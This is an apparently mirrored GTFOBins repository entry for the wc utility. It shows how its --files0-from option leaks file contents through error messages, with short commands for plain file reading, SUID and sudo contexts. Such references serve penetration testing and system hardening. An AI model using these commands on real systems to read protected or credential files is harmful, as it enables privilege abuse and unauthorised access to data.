1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/wc.md
LinuxSploit 69be6785a9
Add wc
2021-04-13 14:00:51 +02:00

17 lines
459 B
Markdown

---
description: The file content is parsed as a sequence of `\x00` separated paths. On error the file content appears in a message, so this may not be suitable to read binary files.
functions:
file-read:
- code: |
LFILE=file_to_read
wc --files0-from "$LFILE"
suid:
- code: |
LFILE=file_to_read
./wc --files0-from "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo wc --files0-from "$LFILE"
---